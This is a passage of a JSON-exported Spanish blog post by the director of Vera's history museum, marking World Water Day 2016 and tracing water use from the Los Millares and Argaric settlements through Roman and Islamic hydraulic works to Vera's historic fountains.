{"id":2057,"date":"2016-04-14T12:44:48","date_gmt":"2016-04-14T12:44:48","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=2057"},"modified":"2016-04-14T12:44:48","modified_gmt":"2016-04-14T12:44:48","slug":"exposicion-dia-mundial-del-agua","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2016\/04\/14\/exposicion-dia-mundial-del-agua\/","title":{"rendered":"EXPOSICI\u00d3N D\u00cdA MUNDIAL DEL AGUA"},"content":{"rendered":"<p class=\"western\"><b>EXPOSICI\u00d3N D\u00cdA MUNDIAL DEL AGUA<\/b><\/p>\n<p class=\"western\"><!--more--><\/p>\n<p style=\"text-align: right\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/03\/Domingo-Ortiz-2012.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-1993\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/03\/Domingo-Ortiz-2012.jpg\" alt=\"Domingo Ortiz 2012\" width=\"160\" height=\"264\" \/><\/a><\/p>\n<p style=\"text-align: right\">Domingo Ortiz Soler<\/p>\n<p style=\"text-align: right\">Director del Museo Hist\u00f3rico de Vera<\/p>\n<p>El <b>D\u00eda Internacional del Agua<\/b> se celebra anualmente el 22 de marzo. Es una fecha crucial para recordar la importancia del agua dulce y la defensa de la gesti\u00f3n sostenible de los recursos. Se celebra desde hace 23 a\u00f1os y cada a\u00f1o se dedica a un tema \u00edntimamente ligado con este recurso h\u00eddrico. En 2016 se dedica Al Agua y el Trabajo. En este d\u00eda,\u00a0pa\u00edses y decenas de millones de personas se involucran y participan de diferentes maneras con el objetivo de tomar conciencia sobre la importancia de ese preciado \u2018oro\u2019 l\u00edquido, imprescindible para la vida en el Planeta Terra.\u00a0Es un d\u00eda que nos brinda la\u00a0oportunidad de aprender m\u00e1s sobre\u00a0temas relacionados con el agua,\u00a0divulgar e influir\u00a0al mayor n\u00famero de personas, a\u00a0tomar medidas y\u00a0lograr juntos los cambios.<\/p>\n<p><strong>\u00abEl agua y el trabajo\u00bb <\/strong>es el tema del D\u00eda Mundial del Agua 2016. Est\u00e1 coordinado, con el nombre de ONU-Agua, por la Organizaci\u00f3n Internacional del Trabajo Organizaci\u00f3n (OIT) &#8211; la entidad de la ONU que promueve los derechos en el trabajo, fomenta oportunidades de empleo decente, mejora la protecci\u00f3n social y fortalece el di\u00e1logo sobre cuestiones relacionadas con el trabajo.<\/p>\n<p>Hoy en d\u00eda, casi la mitad de los trabajadores del mundo &#8211; 1,5 mil millones de personas &#8211; trabaja en sectores relacionados con el agua y la mayor\u00eda de los puestos de trabajo dependen de ella, por lo que es b\u00e1sico asegurar una entrega segura.\u00a0Sin embargo, son millones las personas que trabajan a menudo con el agua y lamentablemente no son reconocidos ni protegidos por los derechos laborales b\u00e1sicos.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CARTEL-OFICIAL-DIA-MUNIDIAL-DEL-AGUA.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-2066\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CARTEL-OFICIAL-DIA-MUNIDIAL-DEL-AGUA-300x155.jpg\" alt=\"CARTEL OFICIAL DIA MUNIDIAL DEL AGUA\" width=\"300\" height=\"155\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CARTEL-OFICIAL-DIA-MUNIDIAL-DEL-AGUA-300x155.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CARTEL-OFICIAL-DIA-MUNIDIAL-DEL-AGUA.jpg 413w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>El tema en 2016\u00a0 \u201c<b>El agua y el trabajo<\/b>\u201d, tiene como objetivo mostrar el poder de c\u00f3mo la cantidad y calidad de agua, transforma la vida de las personas. El agua cambia los medios de vida de los trabajadores influyendo directamente en la transformaci\u00f3n de las sociedades y las econom\u00edas.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/\u201cHay-una-gota-de-infelicidad-en-tener-m\u00e1s-de-lo-que-se-necesita\u201d.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-2058\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/\u201cHay-una-gota-de-infelicidad-en-tener-m\u00e1s-de-lo-que-se-necesita\u201d-300x129.jpg\" alt=\"\u201cHay una gota de infelicidad en tener m\u00e1s de lo que se necesita\u201d\" width=\"300\" height=\"129\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/\u201cHay-una-gota-de-infelicidad-en-tener-m\u00e1s-de-lo-que-se-necesita\u201d-300x129.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/\u201cHay-una-gota-de-infelicidad-en-tener-m\u00e1s-de-lo-que-se-necesita\u201d-1024x441.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/\u201cHay-una-gota-de-infelicidad-en-tener-m\u00e1s-de-lo-que-se-necesita\u201d.jpg 1773w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"color: #3366ff\">\u201c<span style=\"font-size: small\"><i><b>Hay una gota de infelicidad en tener m\u00e1s de lo que se necesita\u201d<\/b><\/i><\/span><\/span><\/p>\n<p>Hoy, muchos r\u00edos que est\u00e1n contaminados de inmundicias, de productos qu\u00edmicos y matamos la vida que hay en esa gran corriente de agua; los r\u00edos se secan, y no recapacitamos al respecto. Hay grupos ecologistas que luchan por defender tan considerado l\u00edquido. Algunas civilizaciones como la isl\u00e1mica, la romana, los Hebreos, construyeron puentes y acueductos que datan de la antig\u00fcedad, algunos en uso en los actuales momentos y donde el agua fue tra\u00edda desde lejos. Hay culturas, que han tenido muy en cuenta su importancia y lo vemos en sus construcciones, en las cuales, siempre estuvo presente el agua, y, sobre todo, hace innumerables a\u00f1os que canalizaron los r\u00edos para la agricultura, y trajeron el agua a las ciudades y se dedicaron a protegerla.<br \/>\nY para tener una mentalidad abierta sobre la importancia del agua, qu\u00e9 mejor recordar el origen del uso del agua a trav\u00e9s de la Historia.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CADA-GOTA-DE-AGUA-UNA-GOTA-DE-VIDA.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2063\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CADA-GOTA-DE-AGUA-UNA-GOTA-DE-VIDA-300x192.jpg\" alt=\"CADA GOTA DE AGUA UNA GOTA DE VIDA\" width=\"300\" height=\"192\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CADA-GOTA-DE-AGUA-UNA-GOTA-DE-VIDA-300x192.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CADA-GOTA-DE-AGUA-UNA-GOTA-DE-VIDA-1024x657.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CADA-GOTA-DE-AGUA-UNA-GOTA-DE-VIDA.jpg 1478w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\"><b>LOS ANCESTROS TRABAJOS DEL AGUA <\/b><\/p>\n<p class=\"western\">\u00bfCu\u00e1l ha sido la historia del agua potable? Si buscamos en los or\u00edgenes la idea naci\u00f3 de la necesidad del hombre de trasladar y distribuir el agua a los lugares m\u00e1s apartados, ya que los asentamientos humanos o poblados crec\u00edan all\u00ed donde hab\u00eda agua.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/pOBLADO-DE-LOS-MILLARES-Y-SU-CANALIZACI\u00d3N-DE-AGUA.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2081\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/pOBLADO-DE-LOS-MILLARES-Y-SU-CANALIZACI\u00d3N-DE-AGUA-300x221.jpg\" alt=\"pOBLADO DE LOS MILLARES Y SU CANALIZACI\u00d3N DE AGUA\" width=\"300\" height=\"221\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/pOBLADO-DE-LOS-MILLARES-Y-SU-CANALIZACI\u00d3N-DE-AGUA-300x221.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/pOBLADO-DE-LOS-MILLARES-Y-SU-CANALIZACI\u00d3N-DE-AGUA.jpg 818w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"color: #0000ff\"><span style=\"font-size: small\"><i><b>Poblado calcol\u00edtico de Los Millares y su canalizaci\u00f3n de agua<\/b><\/i><\/span><\/span><\/p>\n<p class=\"western\" align=\"justify\">Y en nuestro territorio almerienses de tenemos constancia arqueol\u00f3gica de que en el poblado de los Millares construido hace unos 5000 a\u00f1os por un pueblo de tradici\u00f3n eneol\u00edtica dedicado a la agricultura y sobre todo a la explotaci\u00f3n de los primeros metales como fue el cobre (Edad del Cobre de la Cultura de Millares almeriense \u2013Calcol\u00edtico-), ya dispon\u00eda de poblados fortificados con murallas cicl\u00f3peas y canalizaban el agua al poblado desde las laderas de la sierra de Gador (unos 3 Km.).<\/p>\n<p class=\"western\" align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Detalle-de-la-canalizaci\u00f3n-del-poblado-y-su-cisterna.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2069\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Detalle-de-la-canalizaci\u00f3n-del-poblado-y-su-cisterna-232x300.jpg\" alt=\"Detalle de la canalizaci\u00f3n del poblado y su cisterna\" width=\"232\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Detalle-de-la-canalizaci\u00f3n-del-poblado-y-su-cisterna-232x300.jpg 232w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Detalle-de-la-canalizaci\u00f3n-del-poblado-y-su-cisterna.jpg 462w\" sizes=\"(max-width: 232px) 100vw, 232px\" \/><\/a><\/p>\n<p class=\"western\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Detalle de la canalizaci\u00f3n del poblado y su cisterna<\/b><\/i><\/span><\/span><\/p>\n<p class=\"western\">Y otra cultura posterior, que inicia la Edad del Bronce en nuestro territorio conocida como <i>Cultura arg\u00e1rica<\/i>, ya dispon\u00edan de sistemas de regad\u00edo a trav\u00e9s de captaci\u00f3n de aguas en galer\u00eda excavada en la roca, (precursora de lo que ser\u00edan los kanats isl\u00e1micos medievales) y que se encuentra en el poblado de GATAS en la sierra de Turre. Y en Vera, junto a los Cabezos Pelaos otra galer\u00eda que abastec\u00eda a un poblado asentado de los Cabecicos Negros&#8230;, etc.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Galer\u00edas-del-poblado-arg\u00e1rico-de-Gatas.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2076\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Galer\u00edas-del-poblado-arg\u00e1rico-de-Gatas-300x288.jpg\" alt=\"Galer\u00edas del poblado arg\u00e1rico de Gatas\" width=\"300\" height=\"288\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Galer\u00edas-del-poblado-arg\u00e1rico-de-Gatas-300x288.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Galer\u00edas-del-poblado-arg\u00e1rico-de-Gatas.jpg 649w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"color: #0000ff\"><span style=\"font-size: small\"><i><b>Galer\u00edas del poblado arg\u00e1rico de Gatas<\/b><\/i><\/span><\/span><\/p>\n<p class=\"western\" align=\"center\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/dibujo-de-galeria-de-gatas.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2070\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/dibujo-de-galeria-de-gatas-300x208.jpg\" alt=\"dibujo de galeria de gatas\" width=\"300\" height=\"208\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/dibujo-de-galeria-de-gatas-300x208.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/dibujo-de-galeria-de-gatas.jpg 869w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\">Y as\u00ed, desde entonces, como venimos diciendo, el agua ha sido y es un activo social de car\u00e1cter b\u00e1sico y la Historia, pues, nos confirma la aspereza de los conflictos por el control de ese recurso escaso\u2026. Hoy la pol\u00edtica del agua.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Balneario.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2062\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Balneario-300x200.jpg\" alt=\"Balneario\" width=\"300\" height=\"200\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Balneario-300x200.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Balneario.jpg 554w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Balneario<\/b><\/i><\/span><\/span><\/p>\n<p class=\"western\"><b>Y<\/b> a otros niveles, podr\u00edamos seguir hablando del agua como una descripci\u00f3n de su trayectoria hist\u00f3rica de la distribuci\u00f3n, tratamiento y purificaci\u00f3n del agua potable. Sus or\u00edgenes, sus razones\u2026<\/p>\n<p class=\"western\">O de la Cultura del Agua y su historia de la tecnolog\u00eda hidr\u00e1ulica, heredera de una gran tradici\u00f3n hidr\u00e1ulica romana, que bien puede servir como contenido de un futuro \u201c<i>seminario sobre la ingenier\u00eda y la gesti\u00f3n del agua a trav\u00e9s de los tiempos. Aprendiendo de la historia<\/i>\u201d.<\/p>\n<p class=\"western\">O sobre la historia de los usos del agua en los tiempos primitivos; es decir, toda una amplia tem\u00e1tica sobre agua y cultura antigua.<\/p>\n<p class=\"western\">Tambi\u00e9n desde otra \u00f3ptica podr\u00edamos hablar del agua como agente terap\u00e9utico con los balnearios, o como suministro a las ciudades desde tiempos antiguos hasta la actualidad\u2026 o el agua y la tecnolog\u00eda el\u00e9ctrica\u2026<\/p>\n<p class=\"western\">O incluso el agua en Marte \u00bfPor qu\u00e9 no?&#8230;.<\/p>\n<p class=\"western\">Pero lo que si intentamos con toda esta argumentaci\u00f3n es que sirva de reflexi\u00f3n sobre la crisis y problem\u00e1tica del agua, ya que la crisis mundial de este preciado liquido, el agua, ha llevado a afirmar que las guerras del siglo XXI ser\u00e1n por el control de este \u201cOro azul\u201d.<\/p>\n<p class=\"western\">Con el agua no s\u00f3lo bebemos vida sino tambi\u00e9n Historia de la Vida.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Fuente-de-los-Cuatro-Ca\u00f1os-de-Vera.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2071\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Fuente-de-los-Cuatro-Ca\u00f1os-de-Vera-300x197.jpg\" alt=\"Fuente de los Cuatro Ca\u00f1os de Vera\" width=\"300\" height=\"197\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Fuente-de-los-Cuatro-Ca\u00f1os-de-Vera-300x197.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Fuente-de-los-Cuatro-Ca\u00f1os-de-Vera.jpg 462w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Fuente de los Cuatro Ca\u00f1os de Vera<\/b><\/i><\/span><\/span><\/p>\n<p class=\"western\">Y en Vera el agua tambi\u00e9n fue vida, una vida de luchas y anhelos a trav\u00e9s del tiempo hist\u00f3rico, quedando de manifiesto no s\u00f3lo la documentaci\u00f3n puramente administrativa, notarial y judicial de aquellos \u201cencuentros y desencuentros\u201d sino tambi\u00e9n la huella de las actuaciones que el hombre ha realizado en forma de ruinas ejemplares de aquellos esfuerzos tit\u00e1nicos y de tecnolog\u00eda punta para la \u00e9poca en que se desarrollaron y que su respeto y conservaci\u00f3n es mantener viva la memoria hist\u00f3rica de nuestro car\u00e1cter e identidad. Usos y aprovechamientos de las aguas para riegos, fuentes de abastecimiento y las Sociedades creadas para su explotaci\u00f3n con la b\u00fasqueda de nuevos recursos h\u00eddricos.<\/p>\n<p class=\"western\">Una historia casi desconocida que ha salido a la luz tras varios a\u00f1os de trabajo de archivo y de campo para su divulgaci\u00f3n y conocimiento del ciudadano veratense. Unos hechos hist\u00f3ricos que tuvieron gran importancia para una tierra sedienta como la nuestra desde siempre y que a\u00fan se manifiesta acuciante esta problem\u00e1tica del agua en la actualidad. Y aqu\u00ed presentamos un breve resumen de esa Historia del Agua.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/fuente-de-los-custro-ca\u00f1os.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2072\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/fuente-de-los-custro-ca\u00f1os-300x199.jpg\" alt=\"fuente de los custro ca\u00f1os\" width=\"300\" height=\"199\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/fuente-de-los-custro-ca\u00f1os-300x199.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/fuente-de-los-custro-ca\u00f1os.jpg 462w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Fuente de los Cuatro Ca\u00f1os de Vera<\/b><\/i><\/span><\/span><b> <\/b><\/p>\n<p class=\"western\" align=\"center\"><b>AGUA Y CIVILIZACI\u00d3N <\/b><\/p>\n<p>As\u00ed vemos que la <b>Historia<\/b> demuestra que todas las civilizaciones entend\u00edan la importancia que ten\u00eda el agua para poder asegurar la supervivencia de la especie. Es por ello que todas las tribus ubicaron sus asentamientos cercanos a zonas geogr\u00e1ficas con abundancia de agua. Los r\u00edos aportaban agua para el riego, para el consumo y como v\u00eda de comunicaci\u00f3n. Ya <i><b>Tales de Mileto <\/b><\/i>(<span style=\"color: #222222\">624 AC-546 AC.<\/span><span style=\"color: #222222\">\u00a0<\/span><span style=\"color: #222222\">Fil\u00f3sofo y matem\u00e1tico griego<\/span>) dec\u00eda que \u2018<i>el agua es el principio de todas las cosas que existen\u2019.<\/i><\/p>\n<p>De los <b>sumerios<\/b>, establecidos entre los r\u00edos Tigris y \u00c9ufrates, cerca de su desembocadura en el Golfo P\u00e9rsico (la antigua Mesopotamia) se tiene conocimiento de su existencia en torno al a\u00f1o 3500 a.C. El modo de utilizaci\u00f3n del agua cumpli\u00f3 un papel determinante en su evoluci\u00f3n socio-econ\u00f3mica, que lleg\u00f3 a convertirse en una civilizaci\u00f3n nacida del agua.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Babilonia.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2061\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Babilonia-300x133.jpg\" alt=\"Babilonia\" width=\"300\" height=\"133\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Babilonia-300x133.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Babilonia.jpg 887w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Babilonia<\/b><\/i><\/span><\/span><\/p>\n<p>La <b>civilizaci\u00f3n egipcia<\/b>, se desarrollo en las orillas del r\u00edo Nilo. Hicieron canales y lagunas para aprovechar el agua en cada crecida. En sus orillas se fundaron grandes ciudades, como en Mesopotamia fue Babilonia.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Ambiente-acu\u00e1tico-en-el-Nilo.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2060\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Ambiente-acu\u00e1tico-en-el-Nilo.jpg\" alt=\"Ambiente acu\u00e1tico en el Nilo\" width=\"283\" height=\"239\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Ambiente acu\u00e1tico en el Nilo<\/b><\/i><\/span><\/span><\/p>\n<p>La <b>Cultura Romana<\/b> desarroll\u00f3 hasta extremos casi insuperados hoy la relaci\u00f3n del hombre con el agua, creando una t\u00e9cnica que actualmente empleamos en nuestras ciudades. El agua jug\u00f3 un papel muy trascendente en Roma, llamada \u201cla ciudad del agua y fueron muy conocidos los ba\u00f1os p\u00fablicos, como en la actualidad.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Acueducto-romano.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2059\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Acueducto-romano-300x173.jpg\" alt=\"Acueducto romano\" width=\"300\" height=\"173\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Acueducto-romano-300x173.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Acueducto-romano.jpg 739w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Acueducto romano<\/b><\/i><\/span><\/span><\/p>\n<p>La vida cotidiana giraba en torno al agua y su sabia utilizaci\u00f3n. Sorprende descubrir todo lo que inventaron y llevaron a la pr\u00e1ctica, hace miles de a\u00f1os y que actualmente seguimos utilizando.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Fuente-p\u00fablica-romana.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2074\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Fuente-p\u00fablica-romana-200x300.jpg\" alt=\"Fuente p\u00fablica romana\" width=\"200\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Fuente-p\u00fablica-romana-200x300.jpg 200w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Fuente-p\u00fablica-romana-683x1024.jpg 683w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Fuente-p\u00fablica-romana.jpg 801w\" sizes=\"(max-width: 200px) 100vw, 200px\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Fuente p\u00fablica romana<\/b><\/i><\/span><\/span><\/p>\n<p>Ya los romanos inventaron: las tintorer\u00edas, piscinas, piscifactor\u00edas (dulces y saladas), tuber\u00edas, grifos monomando, molinos de agua, fuentes decorativas y cascadas, fontaneros, recogida de agua pluvial, cisternas, pago por el suministro p\u00fablico de agua, agua a presi\u00f3n para diferentes usos, cloacas y alcantarillado.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Partidor-de-aguas-romano.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2079\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Partidor-de-aguas-romano-267x300.jpg\" alt=\"Partidor de aguas romano\" width=\"267\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Partidor-de-aguas-romano-267x300.jpg 267w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Partidor-de-aguas-romano.jpg 271w\" sizes=\"(max-width: 267px) 100vw, 267px\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Partidor de aguas romano<\/b><\/i><\/span><\/span><\/p>\n<p>La <b>Cultura Musulmana<\/b> dio una especial importancia al regad\u00edo y las conquistas del siglo VIII iniciaron el resurgimiento de un nuevo tipo de agricultura. Tecnol\u00f3gicamente, la civilizaci\u00f3n musulmana no hizo sino resucitar, conservar, refinar y desarrollar una tecnolog\u00eda practicada desde muy antiguo en el \u00e1mbito del antiguo Pr\u00f3ximo Oriente. Las t\u00e9cnicas de irrigaci\u00f3n nabateas, iranias y babil\u00f3nicas, conocidas a trav\u00e9s de las ideas cient\u00edficas de Grecia y practicadas por los romanos, fueron sintetizadas, desarrolladas y difundidas por los musulmanes.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Nora-vertical-de-r\u00edo.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2078\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Nora-vertical-de-r\u00edo-300x300.jpg\" alt=\"Nora vertical de r\u00edo\" width=\"300\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Nora-vertical-de-r\u00edo-300x300.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Nora-vertical-de-r\u00edo-150x150.jpg 150w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Nora-vertical-de-r\u00edo.jpg 462w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Nora vertical de r\u00edo<\/b><\/i><\/span><\/span><\/p>\n<p>Los musulmanes introdujeron elementos novedosos que les permiti\u00f3 adoptar y adaptar diversos medios y recursos t\u00e9cnicos para la prospecci\u00f3n, captaci\u00f3n, elevaci\u00f3n, almacenamiento, distribuci\u00f3n y uso de aguas en general y en la organizaci\u00f3n y regulaci\u00f3n del riego hasta el punto de que fue el motor de una importante revoluci\u00f3n agr\u00edcola en el siglo XI, y en el cultivo de nuevas especies.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Sistema-de-noria-de-sangre.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2084\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Sistema-de-noria-de-sangre.jpg\" alt=\"Sistema de noria de sangre,\" width=\"277\" height=\"187\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Sistema de noria de sangre,<\/b><\/i><\/span><\/span><\/p>\n<p class=\"western\" align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>con balsa para su conducci\u00f3n al regad\u00edo<\/b><\/i><\/span><\/span><\/p>\n<p>Adem\u00e1s, uno de los aspectos determinantes en el urbanismo isl\u00e1mico y la organizaci\u00f3n de la ciudad es el agua. La existencia de un suministro de agua no solo condiciona la elecci\u00f3n de un lugar de asentamiento, sino que percute en la 